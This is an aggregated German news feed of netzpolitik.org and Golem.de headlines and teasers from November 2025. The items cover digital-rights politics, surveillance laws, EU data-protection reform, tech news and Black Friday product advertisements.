Am Wochenende trifft sich die AfD-Jugend in Gießen. Mit einer faktischen Verbotszone in der Nähe der AfD-Veranstaltung beschränken Polizei und Stadt nun massiv das Grundrecht auf Versammlungsfreiheit. Doch Gegenproteste müssen in Hör- und Sichtweite stattfinden können. Ein Kommentar.

Article link

Date of publish: Tue, 25 Nov 2025 16:10:42 +0000

Verbotszone in Gießen: „Fatales Zeichen, wenn Protest verhindert werden soll“

Viele Menschen auf Demo.
Gießen ist stabil gegen Nazis. Im Februar 2025 demonstrierten mehr als 10.000 gegen Rechts. (Archivbild) – Alle Rechte vorbehalten IMAGO / Müller-Stauffenberg
Die Stadt Gießen hat mehrere Gegendemos in der Nähe der Gründungsveranstaltung der rechtsradikalen AfD-Jugend verboten. Die Anmelder wehren sich dagegen vor dem Verwaltungsgericht und kritisieren massive Einschränkungen der Versammlungsfreiheit.

Article link

Date of publish: Tue, 25 Nov 2025 16:07:58 +0000

Digitaler Omnibus: Das EU-Parlament steuert auf den nächsten Konflikt zu

Die vorgeschlagenen Änderungen an der DSGVO wollen viele Abgeordnete am liebsten ganz verwerfen. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Steve Johnson
In Brüssel nimmt die Debatte um den „digitalen Omnibus“ an Fahrt auf. Während vier Fraktionen im EU-Parlament die Aufweichung von KI- und Datenschutzregeln kritisieren, begrüßen Konservative das Vorhaben grundsätzlich. Werden sie wieder mit Rechtsaußen-Fraktionen stimmen, um das Vorhaben durchzusetzen?

Article link

Date of publish: Mon, 24 Nov 2025 17:41:57 +0000

Novelle des Polizeigesetzes: Sachsen will anlasslos mit Drohnen in fahrende Autos filmen

Eine Drohne
Bitte recht freundlich schauen: Die Polizei will mit Drohnen gegen autofahrende Handy-Nutzer*innen vorgehen. – Alle Rechte vorbehalten IMAGO / imagebroker, Bearbeitung netzpolitik.org
Die sächsische Polizei soll Menschen, die beim Autofahren ihr Handy bedienen, mit Drohnen jagen. Doch das ist nur ein Hammer im Polizeigesetz-Entwurf: Die Polizei soll in Zukunft auch Verhaltensscanner, Palantir-Datenanalyse, Live-Gesichtserkennung, Gesichter-Suchmaschinen und Staatstrojaner nutzen dürfen.

Article link

Date of publish: Mon, 24 Nov 2025 16:35:25 +0000

Digital Fights: Digital Bytes: Datenhändler auf die Leiter jagen

Draufsicht eines trostlosen Verhörraums aus Perspektive einer Überwachungskamera. Sebastian Meineck sitz am Tisch und blickt auf eine Kamera. Auf dem Tisch Utensilien: Lampe, rose Telefon, vertrocknete Pflanze, BND Schreibblock und eine Digitaluhr ist auf 13:12 stehen geblieben.
Wir lassen uns nicht einschüchtern CC-BY-NC-SA 4.0
Datenhändler verkaufen genaue Standortdaten von potenziell allen Menschen, die ein Handy haben. Seit zwei Jahren recherchieren wir im Dschungel der Databroker und haben dabei schon mehr als 13 Milliarden Standortdaten angehäuft, ohne einen Cent zu zahlen. Wie tief ist der Abgrund der Werbe-Industrie?

Article link

Date of publish: Mon, 24 Nov 2025 06:02:35 +0000

KW 47: Die Woche, als ein Digitalgipfel uns zu Kund:innen machte

Fraktal in schwarz-rot
– Fraktal, generiert mit MandelBrowser von Tomasz Śmigielski
Die 47. Kalenderwoche geht zu Ende. Wir haben 20 neue Texte mit insgesamt 132.907 Zeichen veröffentlicht. Willkommen zum netzpolitischen Wochenrückblick.

Article link

Date of publish: Sat, 22 Nov 2025 08:30:16 +0000

Medienaufsicht: Pornofilter für Betriebssysteme kommt

Kind von hinten, wie es auf Laptop schaut
Kind vor dem Rechner: Eltern sollen per „One-Button-Lösung“ Inhalte filtern können. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Thomas Park
Mit Brandenburg hat auch das letzte Landesparlament für eine Reform des Jugendmedienschutzes gestimmt. Eltern sollen Geräte künftig mit einem Klick in einen Schutzmodus versetzen können. Außerdem wird es für die Medienaufsicht einfacher, Netzsperren zu verhängen.

Article link

Date of publish: Fri, 21 Nov 2025 14:05:09 +0000

European Business Wallet: EU-Kommission plant digitale Identität für Unternehmen

Ein Holzstempel auf einem Papierbogen
Haben Stempel ausgedient? – Gemeinfrei-ähnlich freigegeben durch unsplash.com Markus Spiske
Unternehmen in der EU sollen eine digitale Identität erhalten. Der Vorschlag der EU-Kommission ist Teil des "Digital Omnibus"-Gesetzespakets und gleicht der geplanten digitalen Brieftasche für die EU-Bürger:innen.

Article link

Date of publish: Fri, 21 Nov 2025 12:53:48 +0000

Digitaler Omnibus: Wie Medien aus Angst vor Komplexität eine Debatte verzerren

Ein kleiner blauer Spielzeug-Bus vor gelbem Hintergrund
Wenn man die Komplexität nur weit genug reduziert, dann wird auch der digitale Omnibus freundlich und nett. (Symbolbild) – Gemeinfrei-ähnlich freigegeben durch unsplash.com Mourizal Zativa
Bei sperrigen Themen gerät die Komplexität unter die Räder. Das neue große Gesetzespaket der EU reduzierten einige Medien auf das Thema Cookie-Banner - und gaben dabei die Kritik von Datenschützer:innen teilweise falsch wieder. Sowas muss echt nicht sein. Ein Kommentar.

Article link

Date of publish: Thu, 20 Nov 2025 16:58:20 +0000

FAQ zum „Digitalen Omnibus“: Was plant die EU-Kommission bei KI und Datenschutz?

Drei Personen in formellen Setting sprechen und scherzen miteinander
Offenbar auf einer Linie: Ursula von der Leyen, Emmanuel Macron und Friedrich Merz Ende Oktober in Brüssel. – Alle Rechte vorbehalten IMAGO / Anadolu Agency
Mit ihrem "Digitalen Omnibus" will die Kommission Regeln für risikoreiche KI-Systeme um mehr als ein Jahr hinauszögern und den Datenschutz deutlich einschränken. Industrieverbände begrüßen den Schritt, Verbraucherschützer:innen sind alarmiert. Wir beantworten die wichtigsten Fragen zum Gesetzespaket.

Article link

Date of publish: Thu, 20 Nov 2025 16:40:51 +0000

Psychisch-Kranken-Gesetz in Niedersachsen: Gefährlich per Verwaltungsvorschrift

Ein langer heller Flur in einer Klinik.
Die Entlassung aus einer Klinik sollte ein Zeichen der Genesung sein, nicht der polizeilichen Erfassung. – Alle Rechte vorbehalten Imago|YAY Images, Bearbeitung: netzpolitik.org
Die Polizei in Niedersachsen soll künftig Daten zu vermeintlich gefährlichen Personen erhalten, die zwangsweise in eine Klinik eingewiesen wurden. Was gefährlich heißt, soll das Land definieren. Fachleute halten das für "verfassungsrechtlich bedenklich".

Article link

Date of publish: Thu, 20 Nov 2025 14:06:43 +0000

Online-Verfahren im Zivilrecht: Digitalisierung in der Justiz benachteiligt Menschen

Justizia-Figur, in der einen Waagschale liegt eine 1, in der anderen eine 0
Auf dem Weg zu den Digitalgerichten der Zukunft muss der Zugang zum Recht für alle gewahrt bleiben. (Symbolbild) CC-BY-SA 4.0 Elemente KI-generiert mit Gemini; Montage: netzpolitik.org
Mit einem neuen Gesetz will die Bundesregierung Gerichtsverfahren beschleunigen, die Digitalisierung in der Justiz vorantreiben und Bürger*innen den Zugang zum Recht erleichtern. Dabei benachteiligt sie jedoch die Gruppe der Beklagten und stößt bei Expert*innen auf Kritik.

Article link

Date of publish: Thu, 20 Nov 2025 08:53:31 +0000

Digital Fights: Sieben Werkzeuge für den Online-Rabatz

Illustration: Stilisierte vermummte Person hält in werfender Pose eine Tastatur in der Hand. Dazu Text: Anleitung zum Online-Rabatz.
Werft Zeichen statt Steine. Wir sagen euch wie. CC-BY-NC-SA 4.0 Montage netzpolitik.org
Regierungen werden autoritärer, Konzerne mächtiger, die Überwachungsinstrumente zahlreicher. Es braucht jetzt eine Zivilgesellschaft, die für unser aller Grundrechte kämpft. Mit diesen digitalen Tools kannst du dich für eine freie und solidarische Gesellschaft einsetzen.

Article link

Date of publish: Thu, 20 Nov 2025 06:11:31 +0000

Digitaler Omnibus: Auf Crash-Kurs mit digitalen Grundrechten

Ein liegengebliebener Bus in einer Wüste
Mit dem Omnibus in die Regulierungswüste. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Supradoc
Das angekündigte Reformpaket ist da und die EU-Kommission bleibt auf Konfrontationskurs: Statt den Datenschutz zu vereinfachen, schleift sie Grundrechte. Statt europäischen Unternehmen zu helfen, kommt sie Big Tech entgegen. Ein Kommentar.

Article link

Date of publish: Wed, 19 Nov 2025 17:30:54 +0000

Zensur in Vietnam: Mitarbeiter des deutsch-vietnamesischen Exilmediums Thoibao in Haft

Die Bildschirmaufnahme zeigt einen Fernsehmoderator im vietnamesischen Fernsehen. Im Hintergrund sind Fotos von zwei Personen eingebendet: zwei Verdächtige.
Khoa Trung Lê und sein Mitarbeiter Đỗ Văn Ngà der staatsfeindlichen Propaganda verdächtigt: Das meldete das vietnamesische Fernsehen in den Abendnachrichten. – Alle Rechte vorbehalten Trung Khoa Lê
Der in Berlin unter Polizeischutz stehende Chefredakteur des Nachrichtenportals und sein Mitarbeiter sind in Vietnam wegen staatsfeindlicher Propaganda angeklagt. Die Anklage richtet sich gegen einen Kritiker, der seit Jahren über politische Entwicklungen in Vietnam berichtet. Dem Mitarbeiter droht jahrelange Haft.

Article link

Date of publish: Wed, 19 Nov 2025 16:55:44 +0000

Karsten Wildberger: Digitale Souveränität ganz, ganz wichtig – nur nicht bei Palantir

Souverän lächeln geht einfacher als digitale Souveränität. Digitalminister Wildberger (rechts) an der Seite von David Amiel, Anne Le Henanff, Roland Lescure, Emmanuel Macron, Friedrich Merz und Henna Virkkunen. – Alle Rechte vorbehalten IMAGO / snapshot
Digitalminister Wildberger singt auf dem Digitalisierungsgipfel ein Loblied auf die „digitale Souveränität“. Bis er konkret auf den US-Konzern Palantir und seine Software angesprochen wird. Dann wird klar: Seine schönen Worte sind nur Makulatur. Ein Kommentar.

Article link

Date of publish: Wed, 19 Nov 2025 14:48:00 +0000

US-Kartellrechtsklage gescheitert: Meta entkommt seiner Zerschlagung

Smartphone-Display mit App-Icons, unter anderem von Meta.
Auf dem Markt für soziale Medien herrsche ausreichend Wettbewerb, entschied gestern ein US-Richter. – Alle Rechte vorbehalten IMAGO / Lobeca
In einem Kartellrechtsverfahren hat ein US-Richter es abgelehnt, den Meta-Konzern als Monopolisten einzustufen. An den Übernahmen der Konkurrenten Instagram und WhatsApp sei nichts auszusetzen, der Markt funktioniere, so das wegweisende Urteil. Für Kritiker:innen des Unternehmens ist es eine herbe Niederlage.

Article link

Date of publish: Wed, 19 Nov 2025 14:24:11 +0000

Golem.de

Marvel: Die Spider-Man-Serie, die Stan Lee hasste

Mit der ersten Realversion von Spider-Man war sein Schöpfer überhaupt nicht zufrieden. (Spider-Man, Film)

Article link

Date of publish: Thu, 27 Nov 2025 18:37:02 +0100

Ein Deutscher soll zum Mond fliegen: Ein Deutscher soll zum Mond fliegen

Auf der Ministerratstagung der Esa in Bremen wurden die ersten drei europäischen Nationen verkündet, deren Astronauten zum Mond fliegen dürfen. (Mond, Raumfahrt)

Article link

Date of publish: Thu, 27 Nov 2025 18:13:01 +0100

Simulation zeigt Auswirkungen: KI könnte 12 Prozent des US-Arbeitsmarkts ersetzen

Eine Simulation des MIT zeigt, dass nicht nur technologische Berufe und Ballungsgebiete von Arbeitsplatzverlusten durch KI betroffen wären. (Arbeit, Studien)

Article link

Date of publish: Thu, 27 Nov 2025 17:42:01 +0100

Anzeige: Endoskopkamera mit Licht für nur 16,14 Euro am Black Friday

Eine Endoskopkamera mit Licht zur Inspektion von Rohren, Fahrzeugen und mehr gibt es bei Amazon am Black Friday zum Schnäppchenpreis. (Technik/Hardware, Black Friday)

Article link

Date of publish: Thu, 27 Nov 2025 17:34:01 +0100

Anzeige: In Black Week bei Kleines Kraftwerk über 1.000 Euro sparen

In der Black Week gibt es bei Kleines Kraftwerk Balkonkraftwerke mit und ohne Speicher. Modelle mit Batterie sind um mehr als 1.000 Euro reduziert. (Balkonkraftwerk, Solarenergie)

Article link

Date of publish: Thu, 27 Nov 2025 17:29:02 +0100

Astrophysik: Möglicher Beweis für die dunkle Materie entdeckt

Viele Wissenschaftler glauben an die Existenz der dunklen Materie in unserem Universum. Einen Beweis gibt es bis jetzt nicht. Hat sich das nun geändert? (Astronomie, Wissenschaft)

Article link

Date of publish: Thu, 27 Nov 2025 17:26:02 +0100

Anzeige: Black Friday: FRITZ!Fon X6 nie günstiger als jetzt

Ein stark nachgefragtes Schnurlostelefon mit Smart-Funktionen von FRITZ! ist bei Amazons Black Friday Woche zum Tiefstpreis erhältlich. (Black Friday, Amazon)

Article link

Date of publish: Thu, 27 Nov 2025 17:09:01 +0100

Anzeige: Starker Curved Gaming-Monitor zum neuen Bestpreis

Derzeit findet bei Amazon die Black Friday Woche statt. Während der Aktion gibt es einen starken Gaming-Monitor von MSI zum neuen Bestpreis. (TV & Monitore, Display)

Article link

Date of publish: Thu, 27 Nov 2025 17:00:02 +0100

Arbeitsmarkt: Allianz will wegen KI bis zu 1.800 Jobs streichen

KI soll bei der Allianz unter anderem im Callcenter der Reiseversicherung den Job von Menschen übernehmen. (KI, Wirtschaft)

Article link

Date of publish: Thu, 27 Nov 2025 16:44:02 +0100

Anzeige: Beliebte Anker-Powerbank am Black Friday unter 70 Euro

Ob im Zug, im Büro oder im Flieger: Die Anker-Prime-Powerbank mit Schnellladefunktion lässt weder Smartphone, Laptop noch Switch im Stich. (Anker, Akku)

Article link

Date of publish: Thu, 27 Nov 2025 16:36:01 +0100

Mojang: Minecraft bekommt sein bislang größtes Mount-Update

Das Mounts-of-Mayhem-Update erweitert Minecraft um Reittiere, Kampf sowie Erkundung und bringt neue Mechaniken, Waffen und Kreaturen ins Spiel. (Minecraft, Microsoft)

Article link

Date of publish: Thu, 27 Nov 2025 15:54:02 +0100

Anzeige: Keyboard von Yamaha am Black Friday mit 33 Prozent Rabatt

Amazon hat am Black Friday ein Keyboard von Yamaha mit 61 Tasten, 144 Voices und 158 Styles im Angebot. Perfekt für Einsteiger. (Technik/Hardware, Yamaha)

Article link

Date of publish: Thu, 27 Nov 2025 15:40:02 +0100

Anzeige: Black Friday Woche - Amazons 40 beste Deals unter 50 Euro

Neben hochpreisigen Angeboten sind bei Amazon in der Black Friday Woche viele günstige Artikel erhältlich. Die 40 besten haben wir gesammelt. (Black Friday, Amazon)

Article link

Date of publish: Thu, 27 Nov 2025 14:59:02 +0100

Verstoß gegen Nutzungsbedingungen: OpenAI reagiert mit Klageerwiderung auf Suizid

Nach dem Suizid eines Jugendlichen wirft OpenAI diesem vor, gegen die Nutzungsbedingungen verstoßen und die FAQs missachtet zu haben. (OpenAI, KI)

Article link

Date of publish: Thu, 27 Nov 2025 14:50:02 +0100

Zone 3: Peter Thiels Überwachungstraum als Dystopie im Kino

Palantir ist heute, Alma kommt morgen. Zone 3 zeigt Paris in 20 Jahren als KI-Überwachungsstaat. Ein Sci-Fi-Krimi unweit unserer Gegenwart. Eine Rezension von Daniel Pook (Filmkritik, Film)

Article link

Date of publish: Thu, 27 Nov 2025 14:30:02 +0100

Eurosuit: Decathlon entwirft die Raumanzüge Europas

Der Sportmodehersteller Decathlon entwirft gemeinsam mit seinen Partnern aus der Raumfahrt den europäischen Raumanzug für Inboard-Aktivitäten, den Eurosuit. (Raumfahrt, Ergonomie)

Article link

Date of publish: Thu, 27 Nov 2025 14:15:02 +0100

(g+) Copilot+-Notebooks im Langzeittest: Erstklassige Hardware sucht sinnvollen Zweck

Ein Jahr mit Copilot+-PCs: erstklassige Hardware, sensationelle Akkulaufzeit, unhörbare Lüfter. Aber die KI-Features? Braucht kein Mensch. Ein Erfahrungsbericht von Nils Matthiesen (Copilot, Microsoft)

Article link

Date of publish: Thu, 27 Nov 2025 13:59:02 +0100

Retro-Computer der 80er: ZX Spectrum mit 100 bedruckten Steinen auf Lego Ideas

Die Idee für ein Lego-Set sucht aktuell nach Unterstützern. Das Set soll mehr als 2.000 Steine umfassen - 100 davon bedruckt. (Lego, Spiele)

Article link

Date of publish: Thu, 27 Nov 2025 13:45:02 +0100

Anzeige: De'Longhi-Kaffeevollautomat am Black Friday unter 240 Euro

Der beliebte Kaffeevollautomat De'Longhi Magnifica S ist in der Black Friday Woche besonders günstig zu haben. (Black Friday, Technik/Hardware)

Article link

Date of publish: Thu, 27 Nov 2025 13:15:01 +0100

Anzeige: Black Friday senkt Sonoff-Temperatursensor auf 13,35 Euro

Der Sonoff-Kombisensor misst Temperatur und Luftfeuchtigkeit, verfügt über ein LCD-Display und ist mit Smart-Home-Geräten kompatibel. (Technik/Hardware, Black Friday)

Article link

Date of publish: Thu, 27 Nov 2025 12:39:01 +0100

Netzsperren möglich: EU-Rat erzielt Einigung bei Chatkontrolle

Die verpflichtende Chatkontrolle bleibt Onlineanbietern zwar erspart, andere Regelungen sind aber ebenfalls problematisch. (Chatkontrolle, Datenschutz)

Article link

Date of publish: Thu, 27 Nov 2025 12:30:02 +0100

Nutzerdaten abgeflossen: Dienstleister von OpenAI fällt auf Phishing-SMS rein

Bei dem Webanalyse-Dienstleister Mixpanel sind durch eine Smishing-Attacke Daten abgeflossen. Das betrifft auch Nutzer des ChatGPT-Entwicklers OpenAI. (Datenleck, KI)

Article link

Date of publish: Thu, 27 Nov 2025 12:15:03 +0100

Anzeige: Internetradio mit DAB+ zum Tiefstpreis am Black Friday

Ein beliebtes Internetradio von TechniSat mit DAB+, WLAN, Bluetooth, USB und UKW ist am Black Friday bei Amazon günstig wie nie. (Internetradio, WLAN)

Article link

Date of publish: Thu, 27 Nov 2025 12:13:02 +0100

Octopi Launcher für Android im Test: Dieser neue Android-Launcher schlägt den Nova Launcher

Es gibt einen neuen Stern am Launcher-Himmel: Der Octopi Launcher gehört zu den besten Launchern, die es derzeit für Android gibt. Ein Erfahrungsbericht von Ingo Pakalski (Software, Smartphone)

Article link

Date of publish: Thu, 27 Nov 2025 12:00:02 +0100

Tim Sweeney: "Das KI-Label ist nur bei Kunstausstellungen sinnvoll"

Epic-Chef Tim Sweeney hält KI-Labels bei Spielen für überflüssig und stößt damit eine Debatte an. (Tim Sweeney, KI)

Article link

Date of publish: Thu, 27 Nov 2025 11:55:02 +0100

E-Mails und Termine: Google macht mit Gmail-Update Exchange-Nutzung kaputt

Mit einem Update der Gmail-App funktioniert die Exchange-Anbindung nicht mehr. Auch nach zwei Wochen gibt es keine Hilfe von Google. (Gmail, Google)

Article link

Date of publish: Thu, 27 Nov 2025 11:40:02 +0100

Verhext: Cyberpunk 2077 ist erfolgreichste Reihe bei CD Projekt Red

Cyberpunk 2077 wird für CD Projekt Red immer wichtiger, während das Studio parallel an einer ganzen Reihe neuer Witcher-Spiele arbeitet. (Cyberpunk 2077, The Witcher)

Article link

Date of publish: Thu, 27 Nov 2025 11:24:01 +0100

Anzeige: Govee LED Strip (20 m) zum Black Friday unter 20 Euro

Der 20-Meter-LED-Strip von Govee fällt am Black Friday auf einen Amazon-Tiefstpreis und zählt zu den meistgekauften RGBIC-Lichtlösungen. (Black Friday, LED)

Article link

Date of publish: Thu, 27 Nov 2025 11:12:02 +0100

Cyberbehörde warnt: Signal- und Whatsapp-Nutzer laufend mit Spyware attackiert

Zuletzt sind wiederholt Spyware-Attacken auf Nutzer von Whatsapp und Signal beobachtet worden. Die Cisa warnt und benennt Schutzmaßnahmen. (Spionage, Virus)

Article link

Date of publish: Thu, 27 Nov 2025 11:07:02 +0100

Trend in Deutschland: 90 Prozent der jungen Befragten nutzen KI im Alltag

Eine Umfrage kommt zu dem Schluss: Immer mehr Deutsche nutzen KI im Alltag. Ob das allen bewusst ist, lässt sich aber schwer sagen. (KI, Studien)

Article link

Date of publish: Thu, 27 Nov 2025 10:52:02 +0100

Onlinehandel: Zahl der Retouren steigt auf Rekordwert

Rücksendungen von Onlinebestellungen sind oft kostenfrei. Kunden machen davon ausgiebig Gebrauch, wie aktuelle Zahlen zeigen. (Onlinehandel, Wirtschaft)

Article link

Date of publish: Thu, 27 Nov 2025 10:30:05 +0100

Anzeige: Kopfhörer Soundcore Liberty 5 am Black Friday zum Bestpreis

Die Kopfhörer Soundcore Liberty 5 mit adaptivem ANC, Dolby Audio und LDAC sind am Black Friday bei Amazon so günstig wie noch nie. (Kopfhörer, Audio/Video)

Article link

Date of publish: Thu, 27 Nov 2025 10:11:02 +0100

CPU, RAM, SSD, Kühler: Die große Hardware-Kaufberatung zu Weihnachten

Zu Weihnachten soll es einen PC oder neue Hardware geben? Wir geben Hilfestellung bei der Navigation durch hohe Speicherpreise und CPU-Geheimtipps. Ein Ratgebertext von Martin Böckmann (PC-Hardware, Prozessor)

Article link

Date of publish: Thu, 27 Nov 2025 09:56:02 +0100

Verkehrswende: Söder will E-Auto-Förderung auf Hybride ausweiten

Markus Söder will Insidern zufolge die kommende Elektroauto-Förderung nicht nur auf rein batterieelektrische Fahrzeuge beschränken. (Elektroauto, Politik)

Article link

Date of publish: Thu, 27 Nov 2025 09:49:02 +0100

Google statt Microsoft: Airbus will seit sieben Jahren von Microsoft Office weg

Die Alternative Google Workspace muss oft parallel zu Microsoft Office genutzt werden, da sie etwa riesige Excel-Tabellen nicht unterstützt. (Office, Office-Suite)

Article link

Date of publish: Thu, 27 Nov 2025 09:42:02 +0100

Anzeige: Lego Notre-Dame de Paris am Black-Friday 80 Euro günstiger

Das Lego Architecture Set der Kathedrale Notre-Dame mit über 4.000 Teilen hat zum Black Friday einen neuen Amazon-Bestpreis. (Lego, Beleuchtung)

Article link

Date of publish: Thu, 27 Nov 2025 09:35:02 +0100

Studie zeigt: [EXTERN]-Tags schützen kaum vor Datenklau via Phishing

Forscher haben die Wirksamkeit gängiger Anti-Phishing-Maßnahmen untersucht. [EXTERN]-Tags kamen dabei besonders schlecht weg. (Phishing, Spam)

Article link

Date of publish: Thu, 27 Nov 2025 09:16:02 +0100

Update: Opendesk 1.10 erhöht Sicherheit und optimiert Zusammenarbeit

Mit der Veröffentlichung von Opendesk 1.10 stehen Behörden neue Funktionen für Sicherheit und Verwaltung bereit. (Opendesk, Projektmanagement)

Article link

Date of publish: Thu, 27 Nov 2025 09:06:01 +0100

Redwires Otter: Darpa will ein Raumfahrzeug für den sehr niedrigen Erdorbit

Das US-Unternehmen Redwire arbeitet an einem Raumfahrzeug, das in einer Höhe von 90 bis 450 Kilometern lang andauernde Weltall-Missionen fliegen kann. (Darpa, Raumfahrt)

Article link

Date of publish: Thu, 27 Nov 2025 08:47:02 +0100

Internetsatelliten-Konkurrenz: Das Internet könnte bald aus der Stratosphäre kommen

Bisherige Konzepte sind zwar gescheitert, aber ein Unternehmen ist sich sicher, Starlink und Co. bald in die Museen unserer Zeit zu verweisen. (Innovation, Satelliteninternet)

Article link

Date of publish: Thu, 27 Nov 2025 08:35:02 +0100